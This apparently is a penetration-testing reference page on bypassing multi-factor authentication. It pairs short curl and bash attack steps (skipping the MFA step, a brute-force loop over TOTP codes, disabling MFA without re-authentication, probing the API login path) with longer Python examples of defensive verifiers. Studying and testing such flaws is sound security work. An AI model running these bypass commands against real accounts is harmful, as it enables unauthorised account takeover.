
MFA Bypass

CWE: CWE-308
Tools: burp, jwt_tool
Difficulty: 🔴 advanced

Bypass MFA

Skip the MFA Step

After completing password authentication, attempt to access post-MFA endpoints directly without completing the MFA challenge.

# Step 1: Complete password authentication
curl -X POST "https://TARGET/login" -d "username=test&password=test" -c cookies.txt

# Step 2: Skip MFA -- go directly to protected resource
curl -b cookies.txt "https://TARGET/dashboard"

# Also try:
# - Manipulating state/step parameters in the request
# - Removing MFA-related cookies or tokens
# - Accessing the API directly instead of the web flow

Brute Force MFA Codes

# 6-digit TOTP = 1,000,000 combinations
# 30-second window typically accepts 2-3 codes
# $session holds the session cookie value issued after password authentication
for code in {000000..000100}; do
    response=$(curl -s -X POST "https://TARGET/mfa/verify" \
        -b "session=$session" \
        -d "code=$code")
    echo "Code $code: $response"
done

# Check for rate limiting on the MFA endpoint specifically
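The loop above only works when the verification endpoint has no attempt budget and accepts a code more than once. As an added example (not code from this page), the following Python shows what a verifier that closes both gaps looks like: an RFC 6238 TOTP check with a small clock-skew window, a constant-time comparison, a per-session failure counter that locks the session, and a replay guard so an accepted code cannot be submitted again. The class and constant names (`MfaVerifier`, `MAX_ATTEMPTS`, `LOCK_SECONDS`) and the policy values are assumptions for illustration; the test vectors are the published RFC 4226/6238 ones.

```python
import hashlib
import hmac
import struct
import time
from typing import Dict, Optional, Tuple

MAX_ATTEMPTS = 5     # failed submissions allowed per login session (assumed policy)
LOCK_SECONDS = 900   # how long a session stays locked after exhausting attempts (assumed policy)
STEP = 30            # TOTP time step in seconds
DRIFT = 1            # accept only the previous and next step, for clock skew


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(binary % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: int, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP over the number of elapsed time steps."""
    return hotp(secret, at // STEP, digits)


class MfaVerifier:
    """Server-side verification state: attempt counter, lockout and a per-secret replay guard."""

    def __init__(self) -> None:
        self._failures: Dict[str, int] = {}      # session_id -> failed attempts so far
        self._locked_until: Dict[str, int] = {}  # session_id -> unix time the lock expires
        self._last_step: Dict[bytes, int] = {}   # secret -> last accepted time step (no code reuse)

    def verify(self, session_id: str, secret: bytes, submitted: str,
               now: Optional[int] = None) -> Tuple[bool, str]:
        now = int(time.time()) if now is None else now
        if self._locked_until.get(session_id, 0) > now:
            return False, "locked"
        if self._failures.get(session_id, 0) >= MAX_ATTEMPTS:
            # Budget exhausted: lock the session rather than letting a loop keep guessing.
            self._locked_until[session_id] = now + LOCK_SECONDS
            self._failures[session_id] = 0   # fresh budget once the lock expires
            return False, "locked"
        current = now // STEP
        for step in range(current - DRIFT, current + DRIFT + 1):
            # Constant-time comparison so response timing does not reveal matching digits.
            if hmac.compare_digest(hotp(secret, step), submitted):
                if step <= self._last_step.get(secret, -1):
                    return False, "replayed"   # this code (or an older one) was already used
                self._last_step[secret] = step
                self._failures.pop(session_id, None)
                return True, "ok"
        self._failures[session_id] = self._failures.get(session_id, 0) + 1
        return False, "invalid"
```

The two failure counters are keyed by login session, which is the unit the page's loop attacks; a production service would also count per account and per source address so that a fresh session does not reset the budget.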

Exploit MFA Implementation Flaws

  • Response manipulation: Intercept the MFA verification response. Can you change a failure to success?
  • Backup code abuse: Are backup codes single-use? Can unlimited codes be generated? Are they predictable?
  • MFA removal without re-auth: Can MFA be disabled from settings without re-entering the password or current MFA code?

curl -X POST "https://TARGET/settings/mfa/disable" -b cookies.txt
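The three flaws in this list share one root cause: the server trusts something other than its own record of what has been verified. As an added example (not code from this page), here is a small account-settings model in Python in which backup codes are stored hashed and consumed on first use, regenerating them and disabling MFA both require a fresh server-recorded MFA verification, and disabling additionally re-checks the password. Because the decision rests on the server's `mfa_verified_at` timestamp, rewriting a verification response in transit changes nothing. `MfaSettings`, `STEP_UP_MAX_AGE` and the other names and policy values are assumptions for illustration.

```python
import hashlib
import hmac
import os
import secrets
import time
from typing import Dict, List, Optional, Tuple

BACKUP_CODE_COUNT = 10
STEP_UP_MAX_AGE = 300    # seconds a completed MFA check counts as "fresh" for sensitive actions (assumed policy)
PBKDF2_ROUNDS = 100_000


def _hash_backup_code(code: str, salt: bytes) -> bytes:
    # Backup codes are random and high entropy, so a salted SHA-256 is adequate here.
    return hashlib.sha256(salt + code.encode()).digest()


class MfaSettings:
    """MFA settings for one account: single-use backup codes and step-up for disabling MFA."""

    def __init__(self, password: str) -> None:
        self._pw_salt = os.urandom(16)
        self._pw_hash = hashlib.pbkdf2_hmac("sha256", password.encode(), self._pw_salt, PBKDF2_ROUNDS)
        self._backup_salt = os.urandom(16)
        self._backup_hashes: List[bytes] = []
        self.mfa_enabled = True

    def check_password(self, password: str) -> bool:
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), self._pw_salt, PBKDF2_ROUNDS)
        return hmac.compare_digest(candidate, self._pw_hash)

    @staticmethod
    def _fresh_mfa(session: Dict[str, int], now: int) -> bool:
        # The session records when the server itself verified MFA; nothing the client sends is consulted.
        return now - session.get("mfa_verified_at", -10 ** 9) <= STEP_UP_MAX_AGE

    def generate_backup_codes(self, session: Dict[str, int], now: Optional[int] = None) -> Optional[List[str]]:
        """Issue a fresh set, invalidating any older set. Requires a fresh MFA verification."""
        now = int(time.time()) if now is None else now
        if not self._fresh_mfa(session, now):
            return None
        codes = [secrets.token_hex(5) for _ in range(BACKUP_CODE_COUNT)]   # 40 bits each, shown once
        self._backup_hashes = [_hash_backup_code(c, self._backup_salt) for c in codes]
        return codes

    def redeem_backup_code(self, code: str) -> bool:
        """Consume a backup code; redeeming the same code a second time fails."""
        digest = _hash_backup_code(code, self._backup_salt)
        for i, stored in enumerate(self._backup_hashes):
            if hmac.compare_digest(stored, digest):
                del self._backup_hashes[i]   # single use
                return True
        return False

    def disable_mfa(self, session: Dict[str, int], password: str, now: Optional[int] = None) -> Tuple[bool, str]:
        """Disabling MFA is a step-up action: current password plus a fresh MFA check."""
        now = int(time.time()) if now is None else now
        if not self.check_password(password):
            return False, "bad_password"
        if not self._fresh_mfa(session, now):
            return False, "mfa_reauth_required"
        self.mfa_enabled = False
        self._backup_hashes.clear()   # old backup codes must not outlive the MFA enrollment
        return True, "disabled"
```

Redemption of a backup code should also count against the same attempt budget as TOTP codes; that counter is omitted here to keep the example focused on the three checks in the list.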

Find MFA Scope Gaps

MFA often applies inconsistently across authentication paths:

  • API endpoints may not require MFA
  • Mobile app endpoints may skip MFA
  • OAuth/SSO flows may not enforce MFA
  • Remember-me tokens may bypass MFA entirely

# Test API login path separately
curl -X POST "https://api.TARGET/v1/login" \
-d '{"username":"test","password":"test"}' \
-H "Content-Type: application/json"
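Both "Skip the MFA Step" and this section describe the same server-side defect: the MFA decision is made per entry path, or from client-supplied flow state, rather than from one server-held session state. As an added example (not code from this page), the Python below funnels every login path (web form, JSON API, remember-me) through a single session-creation function, ignores any `step`/`mfa_done` hints the client sends, issues remember-me tokens only to sessions that have completed MFA and expires them, and has the post-MFA endpoint authorize solely on the session's server-side state. `AuthService`, the `verify_code` callback, `REMEMBER_ME_TTL` and the sample accounts are assumptions constructed for illustration.

```python
import hashlib
import hmac
import os
import secrets
import time
from typing import Callable, Dict, Optional, Tuple

PASSWORD_OK = "password_ok"        # password accepted, MFA still pending
AUTHENTICATED = "authenticated"    # MFA completed (or not required for this account)
REMEMBER_ME_TTL = 30 * 24 * 3600   # assumed policy: remember-me tokens live 30 days
PBKDF2_ROUNDS = 100_000


class AuthService:
    """Every login path creates sessions via _start_session, and every protected endpoint
    authorizes on the session's server-side state, so no path or parameter can skip MFA."""

    def __init__(self, users: Dict[str, Dict], verify_code: Callable[[str, str], bool]) -> None:
        # users: {username: {"password": str, "mfa_enabled": bool}} (constructed input; hashed here)
        self._users: Dict[str, Dict] = {}
        for name, u in users.items():
            salt = os.urandom(16)
            self._users[name] = {"salt": salt, "mfa_enabled": u["mfa_enabled"],
                                 "hash": hashlib.pbkdf2_hmac("sha256", u["password"].encode(), salt, PBKDF2_ROUNDS)}
        self._verify_code = verify_code            # TOTP / backup-code check, injected
        self._sessions: Dict[str, Dict] = {}
        self._remember: Dict[bytes, Dict] = {}     # sha256(token) -> {"user", "expires"}

    def _password_ok(self, username: str, password: str) -> bool:
        u = self._users.get(username)
        if u is None:
            hashlib.pbkdf2_hmac("sha256", password.encode(), b"\x00" * 16, PBKDF2_ROUNDS)  # equalize timing
            return False
        return hmac.compare_digest(hashlib.pbkdf2_hmac("sha256", password.encode(), u["salt"], PBKDF2_ROUNDS), u["hash"])

    def _start_session(self, username: str, path: str) -> str:
        """Single chokepoint: the starting state comes from the account's MFA policy, never from the client."""
        state = PASSWORD_OK if self._users[username]["mfa_enabled"] else AUTHENTICATED
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": username, "state": state, "path": path}
        return sid

    def login_web(self, username: str, password: str, form: Dict[str, str]) -> Optional[str]:
        # form may carry "step" or "mfa_done"; such client-supplied flow hints are never consulted.
        return self._start_session(username, "web") if self._password_ok(username, password) else None

    def login_api(self, username: str, password: str) -> Optional[str]:
        # The JSON API path ends up in the same state machine as the web form.
        return self._start_session(username, "api") if self._password_ok(username, password) else None

    def complete_mfa(self, sid: str, code: str) -> bool:
        s = self._sessions.get(sid)
        if s is None or s["state"] != PASSWORD_OK or not self._verify_code(s["user"], code):
            return False
        s["state"] = AUTHENTICATED   # the only transition into the authenticated state
        return True

    def issue_remember_me(self, sid: str, now: Optional[int] = None) -> Optional[str]:
        """Remember-me is a post-MFA credential: never issued to a session still awaiting MFA."""
        s = self._sessions.get(sid)
        if s is None or s["state"] != AUTHENTICATED:
            return None
        now = int(time.time()) if now is None else now
        token = secrets.token_urlsafe(32)
        self._remember[hashlib.sha256(token.encode()).digest()] = {"user": s["user"], "expires": now + REMEMBER_ME_TTL}
        return token

    def login_remember_me(self, token: str, now: Optional[int] = None) -> Optional[str]:
        now = int(time.time()) if now is None else now
        key = hashlib.sha256(token.encode()).digest()
        rec = self._remember.get(key)
        if rec is None or rec["expires"] <= now:
            self._remember.pop(key, None)
            return None
        sid = self._start_session(rec["user"], "remember_me")
        self._sessions[sid]["state"] = AUTHENTICATED   # MFA was satisfied when the token was issued
        return sid

    def get_dashboard(self, sid: str, client_hints: Optional[Dict[str, str]] = None) -> Tuple[int, str]:
        """Post-MFA endpoint: decides on server state only; client_hints is accepted and ignored by design."""
        s = self._sessions.get(sid)
        if s is None:
            return 401, "login_required"
        if s["state"] != AUTHENTICATED:
            return 403, "mfa_required"
        return 200, "dashboard for " + s["user"]
```

The same structure covers the OAuth/SSO case in the list: an identity-provider callback would call `_start_session` too, so an account with `mfa_enabled` still lands in `PASSWORD_OK` unless the provider's assertion is trusted as the second factor by explicit policy.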